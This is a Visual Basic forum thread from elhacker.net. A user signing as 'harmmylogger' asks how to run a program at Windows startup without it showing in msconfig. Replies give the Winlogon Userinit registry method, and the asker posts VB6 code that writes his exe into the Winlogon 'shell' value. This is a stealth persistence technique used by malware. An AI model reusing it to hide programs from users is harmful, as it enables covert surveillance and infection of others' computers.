elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Msconfig hide add to startup
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Msconfig hide add to startup  (Leído 5,512 veces)
Harmmy

Desconectado Desconectado

Mensajes: 24


Visual Basic And Undedected


Ver Perfil
Msconfig hide add to startup
« en: 8 Agosto 2012, 12:11 pm »

add to startup proje msconfig hide
help

Visual Basic 6


En línea

Msn: harmmylogger@hotmail.com
Visual basic and undedected
тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: Msconfig hide add to startup
« Respuesta #1 en: 8 Agosto 2012, 12:15 pm »

WTF


En línea

Harmmy

Desconectado Desconectado

Mensajes: 24


Visual Basic And Undedected


Ver Perfil
Re: Msconfig hide add to startup
« Respuesta #2 en: 8 Agosto 2012, 12:52 pm »

wtf ?
En línea

Msn: harmmylogger@hotmail.com
Visual basic and undedected
тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: Msconfig hide add to startup
« Respuesta #3 en: 8 Agosto 2012, 13:37 pm »

I don't understand anything, sorry.
En línea

Harmmy

Desconectado Desconectado

Mensajes: 24


Visual Basic And Undedected


Ver Perfil
Re: Msconfig hide add to startup
« Respuesta #4 en: 8 Agosto 2012, 14:08 pm »

my project add to startup but msconfig hide
En línea

Msn: harmmylogger@hotmail.com
Visual basic and undedected
#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: Msconfig hide add to startup
« Respuesta #5 en: 8 Agosto 2012, 14:38 pm »

Lo que quiere es añadir su programa al inicio de windows pero que no aparezca en el msconfig.exe.

Oseas, quiere que su programa se inicie cuando inicia windows pero que el usuario no se entere de que lo hace.

PD: Harmmy, this is a Spanish speaking forum. As you can guess most of the people here can't understand you so please use a translator like Google Translate.

Saludos
« Última modificación: 8 Agosto 2012, 14:45 pm por drvy | BSM » En línea

Danyfirex


Desconectado Desconectado

Mensajes: 493


My Dear Mizuho


Ver Perfil
Re: Msconfig hide add to startup
« Respuesta #6 en: 8 Agosto 2012, 16:19 pm »

there are many way.

here one of them


You can add it in Userinit.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon


 Userinit

C:\Windows\system32\userinit.exe,C:\yourprogram.exe


Saludos :)

« Última modificación: 8 Agosto 2012, 16:21 pm por Danyfirex » En línea

Harmmy

Desconectado Desconectado

Mensajes: 24


Visual Basic And Undedected


Ver Perfil
Re: Msconfig hide add to startup
« Respuesta #7 en: 8 Agosto 2012, 18:12 pm »

Can you give a sample project?
En línea

Msn: harmmylogger@hotmail.com
Visual basic and undedected
Danyfirex


Desconectado Desconectado

Mensajes: 493


My Dear Mizuho


Ver Perfil
Re: Msconfig hide add to startup
« Respuesta #8 en: 8 Agosto 2012, 19:35 pm »

Can you give a sample project?

http://www.ex-designz.net/apidetail.asp?api_id=183
En línea

Harmmy

Desconectado Desconectado

Mensajes: 24


Visual Basic And Undedected


Ver Perfil
Re: Msconfig hide add to startup
« Respuesta #9 en: 9 Agosto 2012, 09:19 am »

Thanks :) my project
Código
  1. Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal HKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
  2. Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
  3. Private Declare Function RegCloseKey Lib "advapi32" (ByVal HKey As Long) As Long
  4.  
  5.  
  6. Private Const HKEY_CURRENT_USER = &H80000001
  7. Private Const HKEY_LOCAL_MACHINE = &H80000002
  8. Private Const KEY_WRITE = &H20006
  9. Private Const REG_SZ = 1
  10.  
  11. Private Function Baslangica_Ekle_MsConfige_Gozukmeden()
  12. Dim sMyPath As String
  13. sMyPath = (App.Path & "\" & App.EXEName & ".exe")
  14. Call Dosyayi_Baslangica_Ekle(HKEY_LOCAL_MACHINE, "shell", "explorer.exe," & sMyPath, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
  15. End Function
  16.  
  17. Private Sub Dosyayi_Baslangica_Ekle(ByVal HKey As Long, ByVal MKey As String, ByVal stringKeyVal As String, ByVal subkey As String)
  18. Dim HRKey As Long, StrB As String
  19. Dim retval As Long
  20.    retval = RegOpenKeyEx(HKey, subkey, 0, KEY_WRITE, HRKey)
  21.        If retval <> 0 Then
  22.            Exit Sub
  23.        End If
  24.    StrB = stringKeyVal & vbNullChar
  25.    retval = RegSetValueEx(HRKey, MKey, 0, REG_SZ, ByVal StrB, Len(StrB))
  26.    RegCloseKey HRKey
  27. End Sub
En línea

Msn: harmmylogger@hotmail.com
Visual basic and undedected
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
poner un programa en el startup de windows con bv 6
Programación Visual Basic
sorcerer 9 4,560 Último mensaje 8 Septiembre 2005, 01:56 am
por Slasher-K
Una 'startup' tras la Bilbao Web Summit
Noticias
KarlosVid(ÊÇ) 0 1,423 Último mensaje 13 Mayo 2011, 18:14 pm
por KarlosVid(ÊÇ)
StartUp Manager
GNU/Linux
VIPbie 5 3,097 Último mensaje 11 Junio 2011, 12:58 pm
por Slava_TZD
No enuenttro startup disc en Acronis 11.0
Software
nachitus 1 1,583 Último mensaje 26 Enero 2012, 02:19 am
por simorg
¿Qué vale más en una startup, la idea o la ejecución?
Noticias
wolfbcn 1 1,881 Último mensaje 9 Julio 2012, 18:54 pm
por m0rf
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines